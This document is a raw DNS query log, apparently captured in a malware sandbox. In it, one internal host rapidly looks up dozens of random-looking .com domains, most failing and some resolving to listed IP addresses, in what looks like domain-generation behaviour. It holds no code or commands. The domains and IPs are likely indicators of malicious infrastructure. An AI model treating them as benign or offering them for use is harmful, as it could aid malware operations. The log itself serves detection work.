Aug 23, 2024 18:42:46.285473108 CEST	1.1.1.1	192.168.2.5	0x523a	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.290354967 CEST	1.1.1.1	192.168.2.5	0xafc3	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.293134928 CEST	1.1.1.1	192.168.2.5	0x3d6d	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.293134928 CEST	1.1.1.1	192.168.2.5	0x3d6d	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.295082092 CEST	1.1.1.1	192.168.2.5	0x5fd7	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.295519114 CEST	1.1.1.1	192.168.2.5	0x573c	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.303953886 CEST	1.1.1.1	192.168.2.5	0x378b	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.305248022 CEST	1.1.1.1	192.168.2.5	0x83b3	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.306195021 CEST	1.1.1.1	192.168.2.5	0x52a2	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.306974888 CEST	1.1.1.1	192.168.2.5	0x7ddc	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.323077917 CEST	1.1.1.1	192.168.2.5	0x1ef4	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.324814081 CEST	1.1.1.1	192.168.2.5	0x1ac0	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.333813906 CEST	1.1.1.1	192.168.2.5	0x46ef	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.333986044 CEST	1.1.1.1	192.168.2.5	0x9f84	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.334593058 CEST	1.1.1.1	192.168.2.5	0x3ed5	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.348511934 CEST	1.1.1.1	192.168.2.5	0x31f4	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.348526955 CEST	1.1.1.1	192.168.2.5	0x862e	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.349519968 CEST	1.1.1.1	192.168.2.5	0xebb4	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.351670027 CEST	1.1.1.1	192.168.2.5	0xc04d	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.351777077 CEST	1.1.1.1	192.168.2.5	0x9f55	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.354969978 CEST	1.1.1.1	192.168.2.5	0x2feb	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.359219074 CEST	1.1.1.1	192.168.2.5	0x69b8	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.363795996 CEST	1.1.1.1	192.168.2.5	0x1d5c	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.375447989 CEST	1.1.1.1	192.168.2.5	0xe2c3	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.376749992 CEST	1.1.1.1	192.168.2.5	0xcde0	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.378315926 CEST	1.1.1.1	192.168.2.5	0xa220	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.378359079 CEST	1.1.1.1	192.168.2.5	0x4a0e	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.379072905 CEST	1.1.1.1	192.168.2.5	0x62bc	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.380724907 CEST	1.1.1.1	192.168.2.5	0xf8a9	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.383450985 CEST	1.1.1.1	192.168.2.5	0xb378	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.385917902 CEST	1.1.1.1	192.168.2.5	0xcd97	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.398825884 CEST	1.1.1.1	192.168.2.5	0xb314	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.423268080 CEST	1.1.1.1	192.168.2.5	0xe25	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.436628103 CEST	1.1.1.1	192.168.2.5	0x29aa	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.447778940 CEST	1.1.1.1	192.168.2.5	0xbcaf	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.447778940 CEST	1.1.1.1	192.168.2.5	0xbcaf	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.462271929 CEST	1.1.1.1	192.168.2.5	0xda5b	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.462625027 CEST	1.1.1.1	192.168.2.5	0x5610	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.467257977 CEST	1.1.1.1	192.168.2.5	0xe615	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.467896938 CEST	1.1.1.1	192.168.2.5	0x5536	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.468246937 CEST	1.1.1.1	192.168.2.5	0x9362	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.475143909 CEST	1.1.1.1	192.168.2.5	0x3eb3	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.485038042 CEST	1.1.1.1	192.168.2.5	0x82f	No error (0)	lysyfyj.com		69.162.80.57	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.489335060 CEST	1.1.1.1	192.168.2.5	0xc9a1	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.548357010 CEST	1.1.1.1	192.168.2.5	0xbe2d	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.561549902 CEST	1.1.1.1	192.168.2.5	0x8b0e	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.784091949 CEST	1.1.1.1	192.168.2.5	0xbf47	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.795874119 CEST	1.1.1.1	192.168.2.5	0xf27c	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.994009972 CEST	1.1.1.1	192.168.2.5	0xa3e8	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.994009972 CEST	1.1.1.1	192.168.2.5	0xa3e8	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:47.105501890 CEST	1.1.1.1	192.168.2.5	0x70c9	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:47.105501890 CEST	1.1.1.1	192.168.2.5	0x70c9	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:47.105501890 CEST	1.1.1.1	192.168.2.5	0x70c9	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:47.105501890 CEST	1.1.1.1	192.168.2.5	0x70c9	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:47.105501890 CEST	1.1.1.1	192.168.2.5	0x70c9	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:47.105501890 CEST	1.1.1.1	192.168.2.5	0x70c9	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:47.105501890 CEST	1.1.1.1	192.168.2.5	0x70c9	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:47.105501890 CEST	1.1.1.1	192.168.2.5	0x70c9	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.113511086 CEST	1.1.1.1	192.168.2.5	0xad7d	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.115226030 CEST	1.1.1.1	192.168.2.5	0xf6c6	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.115331888 CEST	1.1.1.1	192.168.2.5	0x8b01	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.116172075 CEST	1.1.1.1	192.168.2.5	0x7eb7	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.118379116 CEST	1.1.1.1	192.168.2.5	0xd125	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.118613005 CEST	1.1.1.1	192.168.2.5	0xfeeb	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.119246006 CEST	1.1.1.1	192.168.2.5	0x5e60	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.120573997 CEST	1.1.1.1	192.168.2.5	0x9fa	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.121222973 CEST	1.1.1.1	192.168.2.5	0xff2d	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.122220993 CEST	1.1.1.1	192.168.2.5	0xd17d	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.124881029 CEST	1.1.1.1	192.168.2.5	0xd957	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.125817060 CEST	1.1.1.1	192.168.2.5	0x11f5	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.126312017 CEST	1.1.1.1	192.168.2.5	0xcb15	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.126914024 CEST	1.1.1.1	192.168.2.5	0x5f9	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.141804934 CEST	1.1.1.1	192.168.2.5	0x9b9f	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.142141104 CEST	1.1.1.1	192.168.2.5	0x759b	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.143404961 CEST	1.1.1.1	192.168.2.5	0xb5e9	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.149189949 CEST	1.1.1.1	192.168.2.5	0x6a22	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.168920040 CEST	1.1.1.1	192.168.2.5	0xd175	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.170751095 CEST	1.1.1.1	192.168.2.5	0x32b	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.171257019 CEST	1.1.1.1	192.168.2.5	0x4ee3	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.181941032 CEST	1.1.1.1	192.168.2.5	0xafdc	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.182725906 CEST	1.1.1.1	192.168.2.5	0xad90	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.184289932 CEST	1.1.1.1	192.168.2.5	0xf178	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.184307098 CEST	1.1.1.1	192.168.2.5	0x1c3e	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.184319019 CEST	1.1.1.1	192.168.2.5	0x751	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.186475992 CEST	1.1.1.1	192.168.2.5	0xa1af	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.187278032 CEST	1.1.1.1	192.168.2.5	0xee1f	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.188328028 CEST	1.1.1.1	192.168.2.5	0x2984	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.189848900 CEST	1.1.1.1	192.168.2.5	0xb33b	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.195024967 CEST	1.1.1.1	192.168.2.5	0x86de	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.203663111 CEST	1.1.1.1	192.168.2.5	0x122a	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.204747915 CEST	1.1.1.1	192.168.2.5	0x7fc1	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.207747936 CEST	1.1.1.1	192.168.2.5	0xcd43	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.210813046 CEST	1.1.1.1	192.168.2.5	0x9750	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.216212034 CEST	1.1.1.1	192.168.2.5	0xf618	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.216840029 CEST	1.1.1.1	192.168.2.5	0x3b77	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.217536926 CEST	1.1.1.1	192.168.2.5	0x6cf9	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.217957973 CEST	1.1.1.1	192.168.2.5	0xd54	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.217968941 CEST	1.1.1.1	192.168.2.5	0xd364	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.218579054 CEST	1.1.1.1	192.168.2.5	0x81af	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.218640089 CEST	1.1.1.1	192.168.2.5	0xe63a	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.219434023 CEST	1.1.1.1	192.168.2.5	0x1d50	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.221354961 CEST	1.1.1.1	192.168.2.5	0xc46f	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.225377083 CEST	1.1.1.1	192.168.2.5	0xfd80	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.228478909 CEST	1.1.1.1	192.168.2.5	0x4296	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.229526997 CEST	1.1.1.1	192.168.2.5	0xf0af	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.230690002 CEST	1.1.1.1	192.168.2.5	0x536	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.230690002 CEST	1.1.1.1	192.168.2.5	0x536	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.230710983 CEST	1.1.1.1	192.168.2.5	0xfcf9	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.240052938 CEST	1.1.1.1	192.168.2.5	0x61c1	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.241903067 CEST	1.1.1.1	192.168.2.5	0xe0a2	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.243267059 CEST	1.1.1.1	192.168.2.5	0x9c58	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.244477987 CEST	1.1.1.1	192.168.2.5	0xdd8b	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.269856930 CEST	1.1.1.1	192.168.2.5	0x198e	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.269856930 CEST	1.1.1.1	192.168.2.5	0x198e	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.292596102 CEST	1.1.1.1	192.168.2.5	0xbf26	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.316507101 CEST	1.1.1.1	192.168.2.5	0xbc6d	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.329531908 CEST	1.1.1.1	192.168.2.5	0x30b8	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.335613012 CEST	1.1.1.1	192.168.2.5	0xcbc4	No error (0)	lysyfyj.com		69.162.80.57	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.346672058 CEST	1.1.1.1	192.168.2.5	0x7d40	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.404066086 CEST	1.1.1.1	192.168.2.5	0x4b8a	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.421329021 CEST	1.1.1.1	192.168.2.5	0x8871	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.726427078 CEST	1.1.1.1	192.168.2.5	0xf373	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.726427078 CEST	1.1.1.1	192.168.2.5	0xf373	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.968385935 CEST	1.1.1.1	192.168.2.5	0x8849	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.968385935 CEST	1.1.1.1	192.168.2.5	0x8849	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.968385935 CEST	1.1.1.1	192.168.2.5	0x8849	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.968385935 CEST	1.1.1.1	192.168.2.5	0x8849	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.968385935 CEST	1.1.1.1	192.168.2.5	0x8849	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.968385935 CEST	1.1.1.1	192.168.2.5	0x8849	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.968385935 CEST	1.1.1.1	192.168.2.5	0x8849	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:49.968385935 CEST	1.1.1.1	192.168.2.5	0x8849	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:51.144913912 CEST	1.1.1.1	192.168.2.5	0xcc42	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:51.144925117 CEST	1.1.1.1	192.168.2.5	0xcc42	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:51.144933939 CEST	1.1.1.1	192.168.2.5	0xcc42	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.214905024 CEST	1.1.1.1	192.168.2.5	0xb9d1	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.215326071 CEST	1.1.1.1	192.168.2.5	0x46ae	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.217475891 CEST	1.1.1.1	192.168.2.5	0x4828	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.218750000 CEST	1.1.1.1	192.168.2.5	0x5916	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.219741106 CEST	1.1.1.1	192.168.2.5	0xaf65	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.219752073 CEST	1.1.1.1	192.168.2.5	0x9179	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.220108986 CEST	1.1.1.1	192.168.2.5	0x524e	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.220472097 CEST	1.1.1.1	192.168.2.5	0x5b49	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.220758915 CEST	1.1.1.1	192.168.2.5	0x70f2	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.221244097 CEST	1.1.1.1	192.168.2.5	0x7af3	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.221556902 CEST	1.1.1.1	192.168.2.5	0xc2f2	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.221700907 CEST	1.1.1.1	192.168.2.5	0xcc9	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.222450018 CEST	1.1.1.1	192.168.2.5	0x6beb	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.224061966 CEST	1.1.1.1	192.168.2.5	0x821d	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.224071980 CEST	1.1.1.1	192.168.2.5	0xefd3	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.224081039 CEST	1.1.1.1	192.168.2.5	0x7922	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.224226952 CEST	1.1.1.1	192.168.2.5	0xe950	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.224226952 CEST	1.1.1.1	192.168.2.5	0xe950	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.239765882 CEST	1.1.1.1	192.168.2.5	0xeebc	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.244261980 CEST	1.1.1.1	192.168.2.5	0xe5ab	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.247988939 CEST	1.1.1.1	192.168.2.5	0x8938	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.288049936 CEST	1.1.1.1	192.168.2.5	0x4432	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.295217991 CEST	1.1.1.1	192.168.2.5	0x87ab	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.307110071 CEST	1.1.1.1	192.168.2.5	0x96ac	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.308768988 CEST	1.1.1.1	192.168.2.5	0xfd10	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.309838057 CEST	1.1.1.1	192.168.2.5	0xfdf2	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.312160015 CEST	1.1.1.1	192.168.2.5	0x6877	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.312262058 CEST	1.1.1.1	192.168.2.5	0x4966	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.312504053 CEST	1.1.1.1	192.168.2.5	0x26f2	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.313086033 CEST	1.1.1.1	192.168.2.5	0x59ac	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.313697100 CEST	1.1.1.1	192.168.2.5	0xaa43	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.314091921 CEST	1.1.1.1	192.168.2.5	0x9fec	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.315191984 CEST	1.1.1.1	192.168.2.5	0xeb46	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.316111088 CEST	1.1.1.1	192.168.2.5	0x1756	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.316239119 CEST	1.1.1.1	192.168.2.5	0x6970	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.316356897 CEST	1.1.1.1	192.168.2.5	0xd196	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.318319082 CEST	1.1.1.1	192.168.2.5	0x107d	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.337261915 CEST	1.1.1.1	192.168.2.5	0xc6b	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.338258028 CEST	1.1.1.1	192.168.2.5	0xc896	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.338267088 CEST	1.1.1.1	192.168.2.5	0xa803	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.338375092 CEST	1.1.1.1	192.168.2.5	0x76b6	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.338861942 CEST	1.1.1.1	192.168.2.5	0x4260	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.396343946 CEST	1.1.1.1	192.168.2.5	0xfe43	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.397361040 CEST	1.1.1.1	192.168.2.5	0x6dc8	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:57.404844046 CEST	1.1.1.1	192.168.2.5	0xffb4	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
